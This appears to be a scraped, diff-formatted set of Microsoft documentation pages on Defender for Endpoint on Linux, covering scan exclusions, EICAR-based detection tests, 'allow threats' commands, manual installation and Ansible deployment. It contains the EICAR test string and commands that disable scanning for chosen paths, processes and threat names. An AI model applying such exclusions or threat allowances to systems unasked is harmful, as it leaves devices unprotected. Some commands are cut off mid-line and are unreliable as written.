-File extension|All files with the extension, anywhere on the device|`.test`
-File|A specific file identified by the full path|`/var/log/test.log`<br/>`/var/log/*.log`<br/>`/var/log/install.?.log`
-Folder|All files under the specified folder (recursively)|`/var/log/`<br/>`/var/*/`
-Process|A specific process (specified either by the full path or file name) and all files opened by it|`/bin/cat`<br/>`cat`<br/>`c?t`
-
-> [!IMPORTANT]
-> The paths above must be hard links, not symbolic links, in order to be successfully excluded. You can check if a path is a symbolic link by running `file <path-name>`.
-
-File, folder, and process exclusions support the following wildcards:
-
-Wildcard|Description|Examples|
-||
-\*|Matches any number of any characters including none (note if this wildcard is not used at the end of the path then it will substitute only one folder)| `/var/*/tmp` includes any file in `/var/abc/tmp` and its subdirectories, and `/var/def/tmp` and its subdirectories. It does not include `/var/abc/log` or `/var/def/log` <p> <p> `/var/*/` includes any file in `/var` and its subdirectories.
-?|Matches any single character|`file?.log` includes `file1.log` and `file2.log`, but not`file123.log`
-> [!NOTE]
-> When using the * wildcard at the end of the path, it will match all files and subdirectories under the parent of the wildcard.
-
-## How to configure the list of exclusions
-
-### From the management console
-
-For more information on how to configure exclusions from Puppet, Ansible, or another management console, see [Set preferences for Defender for Endpoint on Linux](linux-preferences.md).
-
-### From the command line
-
-Run the following command to see the available switches for managing exclusions:
-
-```bash
-mdatp exclusion
-```
-
-> [!TIP]
-> When configuring exclusions with wildcards, enclose the parameter in double-quotes to prevent globbing.
-
-Examples:
--- Add an exclusion for a file extension:-
- ```bash
- mdatp exclusion extension add --name .txt
- ```
-
- ```console
- Extension exclusion configured successfully
- ```
--- Add an exclusion for a file:-
- ```bash
- mdatp exclusion file add --path /var/log/dummy.log
- ```
-
- ```console
- File exclusion configured successfully
- ```
--- Add an exclusion for a folder:-
- ```bash
- mdatp exclusion folder add --path /var/log/
- ```
-
- ```console
- Folder exclusion configured successfully
- ```
--- Add an exclusion for a second folder:-
- ```bash
- mdatp exclusion folder add --path /var/log/
- mdatp exclusion folder add --path /other/folder
- ```
-
- ```console
- Folder exclusion configured successfully
- ```
--- Add an exclusion for a folder with a wildcard in it:-
- ```bash
- mdatp exclusion folder add --path "/var/*/tmp"
- ```
-
- > [!NOTE]
- > This will only exclude paths below */var/\*/tmp/*, but not folders which are siblings of *tmp*; for example, */var/this-subfolder/tmp*, but not */var/this-subfolder/log*.
-
- ```bash
- mdatp exclusion folder add --path "/var/"
- ```
- OR
- ```bash
- mdatp exclusion folder add --path "/var/*/"
- ```
-
-
- > [!NOTE]
- > This will exclude all paths whose parent is */var/*; for example, */var/this-subfolder/and-this-subfolder-as-well*.
-
- ```console
- Folder exclusion configured successfully
- ```
--- Add an exclusion for a process:-
- ```bash
- mdatp exclusion process add --name cat
- ```
-
- ```console
- Process exclusion configured successfully
- ```
--- Add an exclusion for a second process:-
- ```bash
- mdatp exclusion process add --name cat
- mdatp exclusion process add --name dog
- ```
-
- ```console
- Process exclusion configured successfully
- ```
-
-## Validate exclusions lists with the EICAR test file
-
-You can validate that your exclusion lists are working by using `curl` to download a test file.
-
-In the following Bash snippet, replace `test.txt` with a file that conforms to your exclusion rules. For example, if you have excluded the `.testing` extension, replace `test.txt` with `test.testing`. If you are testing a path, ensure that you run the command within that path.
-
-```bash
-curl -o test.txt https://secure.eicar.org/eicar.com.txt
-```
-
-If Defender for Endpoint on Linux reports malware, then the rule is not working. If there is no report of malware, and the downloaded file exists, then the exclusion is working. You can open the file to confirm that the contents are the same as what is described on the [EICAR test file website](https://www.eicar.org/download-anti-malware-testfile/).
-
-If you do not have Internet access, you can create your own EICAR test file. Write the EICAR string to a new text file with the following Bash command:
-
-```bash
-echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*' > test.txt
-```
-
-You can also copy the string into a blank text file and attempt to save it with the file name or in the folder you are attempting to exclude.
-
-## Allow threats
-
-In addition to excluding certain content from being scanned, you can also configure the product not to detect some classes of threats (identified by the threat name). You should exercise caution when using this functionality, as it can leave your device unprotected.
-
-To add a threat name to the allowed list, execute the following command:
-
-```bash
-mdatp threat allowed add --name [threat-name]
-```
-
-The threat name associated with a detection on your device can be obtained using the following command:
-
-```bash
-mdatp threat list
-```
-
-For example, to add `EICAR-Test-File (not a virus)` (the threat name associated with the EICAR detection) to the allowed list, execute the following command:
-
-```bash
-mdatp threat allowed add --name "EICAR-Test-File (not a virus)"
-```
security Linux Install Manually https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-manually.md
- Title: Deploy Microsoft Defender for Endpoint on Linux manually
-description: Describes how to deploy Microsoft Defender for Endpoint on Linux manually from the command line.
-------- m365-security-- tier3-- mde-linux-- Previously updated : 02/21/2024--
-# Deploy Microsoft Defender for Endpoint on Linux manually
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-> [!TIP]
-> Looking for advanced guidance on deploying Microsoft Defender for Endpoint on Linux? See [Advanced deployment guide on Defender for Endpoint on Linux](comprehensive-guidance-on-linux-deployment.md).
-
-This article describes how to deploy Microsoft Defender for Endpoint on Linux manually. A successful deployment requires the completion of all of the following tasks:
--- [Prerequisites and system requirements](#prerequisites-and-system-requirements)-- [Configure the Linux software repository](#configure-the-linux-software-repository)
- - [RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky, and Alma)](#rhel-and-variants-centos-fedora-oracle-linux-amazon-linux-2-rocky-and-alma-1)
- - [SLES and variants](#sles-and-variants-1)
- - [Ubuntu and Debian systems](#ubuntu-and-debian-systems-1)
- - [Mariner](#mariner)
-- [Application installation](#application-installation)
- - [RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky and Alma)](#rhel-and-variants-centos-fedora-oracle-linux-amazon-linux-2-rocky-and-alma)
- - [SLES and variants](#sles-and-variants)
- - [Ubuntu and Debian systems](#ubuntu-and-debian-systems)
- - [Mariner](#mariner-1)
-- [Download the onboarding package](#download-the-onboarding-package)-- [Client configuration](#client-configuration)-
-## Prerequisites and system requirements
-
-Before you get started, see [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) for a description of prerequisites and system requirements for the current software version.
-
-> [!WARNING]
-> Upgrading your operating system to a new major version after the product installation requires the product to be reinstalled. You need to [Uninstall](linux-resources.md#uninstall-defender-for-endpoint-on-linux) the existing Defender for Endpoint on Linux, upgrade the operating system, and then reconfigure Defender for Endpoint on Linux following the below steps.
-
-## Configure the Linux software repository
-
-Defender for Endpoint on Linux can be deployed from one of the following channels (denoted below as *[channel]*): *insiders-fast*, *insiders-slow*, or *prod*. Each of these channels corresponds to a Linux software repository. The instructions in this article describe configuring your device to use one of these repositories.
-
-The choice of the channel determines the type and frequency of updates that are offered to your device. Devices in *insiders-fast* are the first ones to receive updates and new features, followed later by *insiders-slow* and lastly by *prod*.
-
-In order to preview new features and provide early feedback, it's recommended that you configure some devices in your enterprise to use either *insiders-fast* or *insiders-slow*.
-
-> [!WARNING]
-> Switching the channel after the initial installation requires the product to be reinstalled. To switch the product channel: uninstall the existing package, re-configure your device to use the new channel, and follow the steps in this document to install the package from the new location.
-
-## Installer script
-
-While we discuss manual installation, alternatively, you can use an automated [installer bash script](https://github.com/microsoft/mdatp-xplat/blob/master/linux/installation/mde_installer.sh) provided in our [public GitHub repository](https://github.com/microsoft/mdatp-xplat/).
-The script identifies the distribution and version, simplifies the selection of the right repository, sets up the device to pull the latest package, and combines the product installation and onboarding steps.
-
-```bash
-> ./mde_installer.sh --help
-usage: basename ./mde_installer.sh [OPTIONS]
-Options:
--c|--channel specify the channel from which you want to install. Default: insiders-fast--i|--install install the product--r|--remove remove the product--u|--upgrade upgrade the existing product--o|--onboard onboard/offboard the product with <onboarding_script>--p|--passive-mode set EPP to passive mode--t|--tag set a tag by declaring <name> and <value>. ex: -t GROUP Coders--m|--min_req enforce minimum requirements--w|--clean remove repo from package manager for a specific channel--v|--version print out script version--h|--help display help
-```
-
-Read more [here](https://github.com/microsoft/mdatp-xplat/tree/master/linux/installation).
-
-### RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky and Alma)
--- Install `yum-utils` if it isn't installed yet:-
- ```bash
- sudo yum install yum-utils
- ```
-
- > [!NOTE]
- > Your distribution and version, and identify the closest entry (by major, then minor) for it under `https://packages.microsoft.com/config/rhel/`.
-
- Use the following table to help guide you in locating the package:
-
- |Distro & version|Package|
- |||
- |For Alma 8.4 and higher|<https://packages.microsoft.com/config/alma/8/prod.repo>|
- |For Alma 9.2 and higher|<https://packages.microsoft.com/config/alma/9/prod.repo>|
- |For RHEL/Centos/Oracle 9.0-9.8|<https://packages.microsoft.com/config/rhel/9/prod.repo>|
- |For RHEL/Centos/Oracle 8.0-8.9|<https://packages.microsoft.com/config/rhel/8/prod.repo>|
- |For RHEL/Centos/Oracle 7.2-7.9 & Amazon Linux 2 |<https://packages.microsoft.com/config/rhel/7.2/prod.repo>|
- |For Amazon Linux 2023 |<https://packages.microsoft.com/config/amazonlinux/2023/prod.repo>|
- |For Fedora 33|<https://packages.microsoft.com/config/fedora/33/prod.repo>|
- |For Fedora 34|<https://packages.microsoft.com/config/fedora/34/prod.repo>|
- |For Rocky 8.7 and higher|<https://packages.microsoft.com/config/rocky/8/prod.repo>|
- |For Rocky 9.2 and higher|<https://packages.microsoft.com/config/rocky/9/prod.repo>|
-
- <!--|For RHEL/Centos 6.7-6.10|<https://packages.microsoft.com/config/rhel/6/[channel].repo>|-->
-
- In the following commands, replace *[version]* and *[channel]* with the information you've identified:
-
- ```bash
- sudo yum-config-manager --add-repo=https://packages.microsoft.com/config/rhel/[version]/[channel].repo
- ```
-
- > [!TIP]
- > Use hostnamectl command to identify system related information including release *[version]*.
-
- For example, if you're running CentOS 7 and want to deploy Defender for Endpoint on Linux from the *prod* channel:
-
- ```bash
- sudo yum-config-manager --add-repo=https://packages.microsoft.com/config/rhel/7/prod.repo
- ```
-
- Or if you wish to explore new features on selected devices, you might want to deploy Microsoft Defender for Endpoint on Linux to *insiders-fast* channel:
-
- ```bash
- sudo yum-config-manager --add-repo=https://packages.microsoft.com/config/rhel/7/insiders-fast.repo
- ```
--- Install the Microsoft GPG public key:-
- ```bash
- sudo rpm --import https://packages.microsoft.com/keys/microsoft.asc
- ```
-
-### SLES and variants
-
-> [!NOTE]
-> Your distribution and version, and identify the closest entry (by major, then minor) for it under `https://packages.microsoft.com/config/sles/`.
-
- In the following commands, replace *[distro]* and *[version]* with the information you've identified:
-
- ```bash
- sudo zypper addrepo -c -f -n microsoft-[channel] https://packages.microsoft.com/config/[distro]/[version]/[channel].repo
- ```
-
- > [!TIP]
- > Use SPident command to identify system related information including release *[version]*.
-
- For example, if you're running SLES 12 and wish to deploy Microsoft Defender for Endpoint on Linux from the *prod* channel:
-
- ```bash
- sudo zypper addrepo -c -f -n microsoft-prod https://packages.microsoft.com/config/sles/12/prod.repo
- ```
--- Install the Microsoft GPG public key:-
- ```bash
- sudo rpm --import https://packages.microsoft.com/keys/microsoft.asc
- ```
-
-### Ubuntu and Debian systems
--- Install `curl` if it isn't installed yet:-
- ```bash
- sudo apt-get install curl
- ```
--- Install `libplist-utils` if it isn't installed yet:-
- ```bash
- sudo apt-get install libplist-utils
- ```
-
- > [!NOTE]
- > Your distribution and version, and identify the closest entry (by major, then minor) for it under `https://packages.microsoft.com/config/[distro]/`.
-
- In the following command, replace *[distro]* and *[version]* with the information you've identified:
-
- ```bash
- curl -o microsoft.list https://packages.microsoft.com/config/[distro]/[version]/[channel].list
- ```
-
- > [!TIP]
- > Use hostnamectl command to identify system related information including release *[version]*.
-
- For example, if you're running Ubuntu 18.04 and wish to deploy Microsoft Defender for Endpoint on Linux from the *prod* channel:
-
- ```bash
- curl -o microsoft.list https://packages.microsoft.com/config/ubuntu/18.04/prod.list
- ```
--- Install the repository configuration:-
- ```bash
- sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-[channel].list
- ```
-
- For example, if you chose *prod* channel:
-
- ```bash
- sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-prod.list
- ```
--- Install the `gpg` package if not already installed:-
- ```bash
- sudo apt-get install gpg
- ```
-
- If `gpg` isn't available, then install `gnupg`.
-
- ```bash
- sudo apt-get install gnupg
- ```
--- Install the Microsoft GPG public key:
- - For Debian 11 and earlier, run the following command.
-
- ```bash
- curl -sSL https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor | sudo tee /etc/apt/trusted.gpg.d/microsoft.gpg >
- ```
-For Debian 12 and later, run the following command.
-
-```bash
-curl -sSL https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor | sudo tee /usr/share/keyrings/microsoft-prod.gpg >
-```
-- Install the HTTPS driver if not already installed:-
- ```bash
- sudo apt-get install apt-transport-https
- ```
--- Update the repository metadata:-
- ```bash
- sudo apt-get update
- ```
-### Mariner
--- Install `dnf-plugins-core` if it isn't installed yet:-
- ```bash
- sudo dnf install dnf-plugins-core
- ```
--- Configure and Enable the required repositories-
- > [!NOTE]
- > On Mariner, Insider Fast Channel is not available.
-
- If you want to deploy Defender for Endpoint on Linux from the *prod* channel. Use the following commands
-
- ```bash
- sudo dnf install mariner-repos-extras
- sudo dnf config-manager --enable mariner-official-extras
- ```
-
- Or if you wish to explore new features on selected devices, you might want to deploy Microsoft Defender for Endpoint on Linux to *insiders-slow* channel. Use the following commands:
-
- ```bash
- sudo dnf install mariner-repos-extras-preview
- sudo dnf config-manager --enable mariner-official-extras-preview
- ```
-
-## Application installation
-
-### RHEL and variants (CentOS, Fedora, Oracle Linux, Amazon Linux 2, Rocky, and Alma)
-
-```bash
-sudo yum install mdatp
-```
-
-> [!NOTE]
-> If you have multiple Microsoft repositories configured on your device, you can be specific about which repository to install the package from. The following example shows how to install the package from the `production` channel if you also have the `insiders-fast` repository channel configured on this device. This situation can happen if you are using multiple Microsoft products on your device. Depending on the distribution and the version of your server, the repository alias might be different than the one in the following example.
-
-```bash
-# list all repositories
-yum repolist
-```
-
-```console
-...
-packages-microsoft-com-prod packages-microsoft-com-prod 316
-packages-microsoft-com-prod-insiders-fast packages-microsoft-com-prod-ins 2
-...
-```
-
-```bash
-# install the package from the production repository
-sudo yum --enablerepo=packages-microsoft-com-prod install mdatp
-```
-
-### SLES and variants
-
-```bash
-sudo zypper install mdatp
-```
-
-> [!NOTE]
-> If you have multiple Microsoft repositories configured on your device, you can be specific about which repository to install the package from. The following example shows how to install the package from the `production` channel if you also have the `insiders-fast` repository channel configured on this device. This situation can happen if you are using multiple Microsoft products on your device.
-
-```bash
-zypper repos
-```
-
-```console
-...
-# | Alias | Name | ...
-XX | packages-microsoft-com-insiders-fast | microsoft-insiders-fast | ...
-XX | packages-microsoft-com-prod | microsoft-prod | ...
-...
-```
-
-```bash
-sudo zypper install packages-microsoft-com-prod:mdatp
-```
-
-### Ubuntu and Debian systems
-
-```bash
-sudo apt-get install mdatp
-```
-
-> [!NOTE]
-> If you have multiple Microsoft repositories configured on your device, you can be specific about which repository to install the package from. The following example shows how to install the package from the `production` channel if you also have the `insiders-fast` repository channel configured on this device. This situation can happen if you are using multiple Microsoft products on your device.
-
-```bash
-cat /etc/apt/sources.list.d/*
-```
-
-```console
-deb [arch=arm64,armhf,amd64] https://packages.microsoft.com/config/ubuntu/18.04/prod insiders-fast main
-deb [arch=amd64] https://packages.microsoft.com/config/ubuntu/18.04/prod bionic main
-```
-
-```bash
-sudo apt -t bionic install mdatp
-```
-
-> [!NOTE]
-> Reboots are NOT required after installing or updating Microsoft Defender for Endpoint on Linux except when you're running auditD in immutable mode.
-
-### Mariner
-
-```bash
-sudo dnf install mdatp
-```
-
-> [!NOTE]
-> If you have multiple Microsoft repositories configured on your device, you can be specific about which repository to install the package from. The following example shows how to install the package from the `production` channel if you also have the `insiders-slow` repository channel configured on this device. This situation can happen if you are using multiple Microsoft products on your device.
-
-```bash
-sudo dnf config-manager --disable mariner-official-extras-preview
-sudo dnf config-manager --enable mariner-official-extras
-```
-
-## Download the onboarding package
-
-Download the onboarding package from Microsoft Defender portal.
--
-> [!IMPORTANT]
-> If you miss this step, any command executed will show a warning message indicating that the product is unlicensed. Also the `mdatp health` command returns a value of `false`.
-
-1. In the Microsoft Defender portal, go to **Settings > Endpoints > Device management > Onboarding**.
-2. In the first drop-down menu, select **Linux Server** as the operating system. In the second drop-down menu, select **Local Script** as the deployment method.
-3. Select **Download onboarding package**. Save the file as WindowsDefenderATPOnboardingPackage.zip.
-
- :::image type="content" source="media/portal-onboarding-linux.png" alt-text="Downloading an onboarding package in the Microsoft Defender portal" lightbox="media/portal-onboarding-linux.png":::
-
-4. From a command prompt, verify that you have the file, and extract the contents of the archive:
-
- ```bash
- ls -l
- ```
-
- ```console
- total 8
- -rw-r--r-- 1 test staff 5752 Feb 18 11:22 WindowsDefenderATPOnboardingPackage.zip
- ```
-
- ```bash
- unzip WindowsDefenderATPOnboardingPackage.zip
- ```
-
- ```console
- Archive: WindowsDefenderATPOnboardingPackage.zip
- inflating: MicrosoftDefenderATPOnboardingLinuxServer.py
- ```
-
-## Client configuration
-
-1. Copy MicrosoftDefenderATPOnboardingLinuxServer.py to the target device.
-
- > [!NOTE]
- > Initially the client device is not associated with an organization and the *orgId* attribute is blank.
-
- ```bash
- mdatp health --field org_id
- ```
-
-2. Run MicrosoftDefenderATPOnboardingLinuxServer.py.
-
- > [!NOTE]
- > To run this command, you must have `python` or `python3` installed on the device depending on the distro and version. If needed, see [Step-by-step Instructions for Installing Python on Linux](https://opensource.com/article/20/4/install-python-linux).
-
- > [!NOTE]
- > To onboard a device that was previously offboarded you must remove the mdatp_offboard.json file located at /etc/opt/microsoft/mdatp.
-
- If you're running RHEL 8.x or Ubuntu 20.04 or higher, you need to use `python3`.
-
- ```bash
- sudo python3 MicrosoftDefenderATPOnboardingLinuxServer.py
- ```
-
- For the rest of distros and versions, you need to use `python`.
-
- ```bash
- sudo python MicrosoftDefenderATPOnboardingLinuxServer.py
- ```
-
-3. Verify that the device is now associated with your organization and reports a valid organization identifier:
-
- ```bash
- mdatp health --field org_id
- ```
-
-4. Check the health status of the product by running the following command. A return value of `true` denotes that the product is functioning as expected:
-
- ```bash
- mdatp health --field healthy
- ```
-
- > [!IMPORTANT]
- > When the product starts for the first time, it downloads the latest antimalware definitions. This may take up to a few minutes depending on the network connectivity. During this time the above command returns a value of `false`. You can check the status of the definition update using the following command:
- >
- > ```bash
- > mdatp health --field definitions_status
- > ```
- >
- > Please note that you may also need to configure a proxy after completing the initial installation. See [Configure Defender for Endpoint on Linux for static proxy discovery: Post-installation configuration](linux-static-proxy-configuration.md#post-installation-configuration).
-
-5. Run an AV detection test to verify that the device is properly onboarded and reporting to the service. Perform the following steps on the newly onboarded device:
-
- - Ensure that real-time protection is enabled (denoted by a result of `true` from running the following command):
-
- ```bash
- mdatp health --field real_time_protection_enabled
- ```
-
- If it isn't enabled, execute the following command:
-
- ```bash
- mdatp config real-time-protection --value enabled
- ```
-
- - Open a Terminal window and execute the following command:
-
- ``` bash
- curl -o /tmp/eicar.com.txt https://secure.eicar.org/eicar.com.txt
- ```
-
- - The file should be quarantined by Defender for Endpoint on Linux. Use the following command to list all the detected threats:
-
- ```bash
- mdatp threat list
- ```
-
-6. Run an EDR detection test and simulate a detection to verify that the device is properly onboarded and reporting to the service. Perform the following steps on the newly onboarded device:
-
- - Verify that the onboarded Linux server appears in Microsoft Defender XDR. If this is the first onboarding of the machine, it can take up to 20 minutes until it appears.
-
- - Download and extract the [script file](https://aka.ms/LinuxDIY) to an onboarded Linux server and run the following command: `./mde_linux_edr_diy.sh`
-
- - After a few minutes, a detection should be raised in Microsoft Defender XDR.
-
- - Look at the alert details, machine timeline, and perform your typical investigation steps.
-
-## Microsoft Defender for Endpoint package external package dependencies
-
-The following external package dependencies exist for the mdatp package:
--- The mdatp RPM package requires "glibc >= 2.17", "audit", "policycoreutils", "semanage" "selinux-policy-targeted", "mde-netfilter"-- For RHEL6 the mdatp RPM package requires "audit", "policycoreutils", "libselinux", "mde-netfilter"-- For DEBIAN the mdatp package requires "libc6 >= 2.23", "uuid-runtime", "auditd", "mde-netfilter"-- For Mariner the mdatp package requires "attr", "audit", "diffutils", "libacl", "libattr", "libselinux-utils", "selinux-policy", "policycoreutils", "mde-netfilter"-
-The mde-netfilter package also has the following package dependencies:
--- For DEBIAN, the mde-netfilter package requires "libnetfilter-queue1", "libglib2.0-0"-- For RPM, the mde-netfilter package requires "libmnl", "libnfnetlink", "libnetfilter_queue", "glib2"-- For Mariner, the mde-netfilter package requires "libnfnetlink", "libnetfilter_queue"-
-If the Microsoft Defender for Endpoint installation fails due to missing dependencies errors, you can manually download the prerequisite dependencies.
--
-## Log installation issues
-
-See [Log installation issues](linux-resources.md#log-installation-issues) for more information on how to find the automatically generated log that is created by the installer when an error occurs.
-
-## How to migrate from Insiders-Fast to Production channel
-
-1. Uninstall the "Insiders-Fast channel" version of Defender for Endpoint on Linux.
-
- ```bash
- sudo yum remove mdatp
- ```
-
-1. Disable the Defender for Endpoint on Linux Insiders-Fast repo
-
- ```bash
- sudo yum repolist
- ```
-
- > [!NOTE]
- > The output should show "packages-microsoft-com-fast-prod".
-
- ```bash
- sudo yum-config-manager --disable packages-microsoft-com-fast-prod
- ```
-
-1. Redeploy Microsoft Defender for Endpoint on Linux using the "Production channel".
-
-## Uninstallation
-
-See [Uninstall](linux-resources.md#uninstall-defender-for-endpoint-on-linux) for details on how to remove Defender for Endpoint on Linux from client devices.
-
-## See also
--- [Investigate agent health issues](health-status.md)
security Linux Install With Ansible https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/linux-install-with-ansible.md
- Title: Deploy Microsoft Defender for Endpoint on Linux with Ansible-
-description: Describes how to deploy Microsoft Defender for Endpoint on Linux using Ansible.
------- m365-security-- tier3-- mde-linux-- Previously updated : 3/20/2024--
-# Deploy Microsoft Defender for Endpoint on Linux with Ansible
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-investigateip-abovefoldlink)
-
-This article describes how to deploy Defender for Endpoint on Linux using Ansible. A successful deployment requires the completion of all of the following tasks:
--- [Download the onboarding package](#download-the-onboarding-package)-- [Create Ansible YAML files](#create-ansible-yaml-files)-- [Deployment](#deployment)-- [References](#references)---
-## Prerequisites and system requirements
-
-Before you get started, see [the main Defender for Endpoint on Linux page](microsoft-defender-endpoint-linux.md) for a description of prerequisites and system requirements for the current software version.
-
-In addition, for Ansible deployment, you need to be familiar with Ansible administration tasks, have Ansible configured, and know how to deploy playbooks and tasks. Ansible has many ways to complete the same task. These instructions assume availability of supported Ansible modules, such as *apt* and *unarchive* to help deploy the package. Your organization might use a different workflow. Refer to the [Ansible documentation](https://docs.ansible.com/) for details.
--- Ansible needs to be installed on at least one computer (Ansible calls this the control node).-- SSH must be configured for an administrator account between the control node and all managed nodes (devices that will have Defender for Endpoint installed on them), and it is recommended to be configured with public key authentication.-- The following software must be installed on all managed nodes:
- - curl
- - python-apt (if you are deploying on distributions using apt as a package manager)
--- All managed nodes must be listed in the following format in the `/etc/ansible/hosts` or relevant file:-
- ```bash
- [servers]
- host1 ansible_ssh_host=10.171.134.39
- host2 ansible_ssh_host=51.143.50.51
- ```
--- Ping test:-
- ```bash
- ansible -m ping all
- ```
-
-## Download the onboarding package
-
-Download the onboarding package from Microsoft Defender portal.
--
-1. In Microsoft Defender portal, go to **Settings > Endpoints > Device management > Onboarding**.
-2. In the first drop-down menu, select **Linux Server** as the operating system. In the second drop-down menu, select **Your preferred Linux configuration management tool** as the deployment method.
-3. Select **Download onboarding package**. Save the file as WindowsDefenderATPOnboardingPackage.zip.
-
- :::image type="content" source="media/portal-onboarding-linux-2.png" alt-text="The Download onboarding package option" lightbox="media/portal-onboarding-linux-2.png":::
-
-4. From a command prompt, verify that you have the file. Extract the contents of the archive:
-
- ```bash
- ls -l
- ```
- ```Output
- total 8
- -rw-r--r-- 1 test staff 4984 Feb 18 11:22 WindowsDefenderATPOnboardingPackage.zip
- ```
- ```bash
- unzip WindowsDefenderATPOnboardingPackage.zip
- ```
- ```Output
- Archive: WindowsDefenderATPOnboardingPackage.zip
- inflating: mdatp_onboard.json
- ```
-
-## Create Ansible YAML files
-
-Create a subtask or role files that contribute to a playbook or task.
--- Create the onboarding task, `onboarding_setup.yml`:-
- ```bash
- - name: Create MDATP directories
- file:
- path: /etc/opt/microsoft/mdatp/
- recurse: true
- state: directory
- mode: 0755
- owner: root
- group: root
-
- - name: Register mdatp_onboard.json
- stat:
- path: /etc/opt/microsoft/mdatp/mdatp_onboard.json
- register: mdatp_onboard
-
- - name: Extract WindowsDefenderATPOnboardingPackage.zip into /etc/opt/microsoft/mdatp
- unarchive:
- src: WindowsDefenderATPOnboardingPackage.zip
- dest: /etc/opt/microsoft/mdatp
- mode: 0600
- owner: root
- group: root
- when: not mdatp_onboard.stat.exists
- ```
--- Add the Defender for Endpoint repository and key, `add_apt_repo.yml`:-
- Defender for Endpoint on Linux can be deployed from one of the following channels (denoted below as *[channel]*): *insiders-fast*, *insiders-slow*, or *prod*. Each of these channels corresponds to a Linux software repository.
-
- The choice of the channel determines the type and frequency of updates that are offered to your device. Devices in *insiders-fast* are the first ones to receive updates and new features, followed later by *insiders-slow* and lastly by *prod*.
-
- In order to preview new features and provide early feedback, it is recommended that you configure some devices in your enterprise to use either *insiders-fast* or *insiders-slow*.
-
- > [!WARNING]
- > Switching the channel after the initial installation requires the product to be reinstalled. To switch the product channel: uninstall the existing package, re-configure your device to use the new channel, and follow the steps in this document to install the package from the new location.
-
- Note your distribution and version and identify the closest entry for it under `https://packages.microsoft.com/config/[distro]/`.
-
- In the following commands, replace *[distro]* and *[version]* with the information you've identified.
-
- > [!NOTE]
- > In case of Oracle Linux and Amazon Linux 2, replace *[distro]* with "rhel". For Amazon Linux 2, replace *[version]* with "7". For Oracle Linux, replace *[version]* with the version of Oracle Linux.
-
- ```bash
- - name: Add Microsoft APT key
- apt_key:
- url: https://packages.microsoft.com/keys/microsoft.asc
- state: present
- when: ansible_os_family == "Debian"
-
- - name: Add Microsoft apt repository for MDATP
- apt_repository:
- repo: deb [arch=arm64,armhf,amd64] https://packages.microsoft.com/[distro]/[version]/prod [codename] main
- update_cache: yes
- state: present
- filename: microsoft-[channel]
- when: ansible_os_family == "Debian"
-
- - name: Add Microsoft DNF/YUM key
- rpm_key:
- state: present
- key: https://packages.microsoft.com/keys/microsoft.asc
- when: ansible_os_family == "RedHat"
-
- - name: Add Microsoft yum repository for MDATP
- yum_repository:
- name: packages-microsoft-[channel]
- description: Microsoft Defender for Endpoint
- file: microsoft-[channel]
- baseurl: https://packages.microsoft.com/[distro]/[version]/[channel]/
- gpgcheck: yes
- enabled: Yes
- when: ansible_os_family == "RedHat"
- ```
--- Create the Ansible install and uninstall YAML files.-
- - For apt-based distributions use the following YAML file:
-
- ```bash
- cat install_mdatp.yml
- ```
- ```Output
- - hosts: servers
- tasks:
- - include: ../roles/onboarding_setup.yml
- - include: ../roles/add_apt_repo.yml
- - name: Install MDATP
- apt:
- name: mdatp
- state: latest
- update_cache: yes
- ```
-
- ```bash
- cat uninstall_mdatp.yml
- ```
- ```Output
- - hosts: servers
- tasks:
- - name: Uninstall MDATP
- apt:
- name: mdatp
- state: absent
- ```
-
- - For dnf-based distributions use the following YAML file:
-
- ```bash
- cat install_mdatp_dnf.yml
- ```
- ```Output
- - hosts: servers
- tasks:
- - include: ../roles/onboarding_setup.yml
- - include: ../roles/add_yum_repo.yml
- - name: Install MDATP
- dnf:
- name: mdatp
- state: latest
- enablerepo: packages-microsoft-[channel]
- ```
-
- ```bash
- cat uninstall_mdatp_dnf.yml
- ```
- ```Output
- - hosts: servers
- tasks:
- - name: Uninstall MDATP
- dnf:
- name: mdatp
- state: absent
- ```
-
-## Deployment
-
-Now run the tasks files under `/etc/ansible/playbooks/` or relevant directory.
--- Installation:-
- ```bash
- ansible-playbook /etc/ansible/playbooks/install_mdatp.yml -i /etc/ansible/hosts
- ```
-
-> [!IMPORTANT]
-> When the product starts for the first time, it downloads the latest antimalware definitions. Depending on your Internet connection, this can take up to a few minutes.
--- Validation/configuration:-
- ```bash
- ansible -m shell -a 'mdatp connectivity test' all
- ```
- ```bash
- ansible -m shell -a 'mdatp health' all
- ```
--- Uninstallation:-
- ```bash
- ansible-playbook /etc/ansible/playbooks/uninstall_mdatp.yml -i /etc/ansible/hosts
- ```
-
-## Log installation issues
-
-See [Log installation issues](linux-resources.md#log-installation-issues) for more information on how to find the automatically generated log that is created by the installer when an error occurs.
-
-## Operating system upgrades
-
-When upgrading your operating system to a new major version, you must first uninstall Defender for Endpoint on Linux, install the upgrade, and finally reconfigure Defender for Endpoint on Linux on your device.
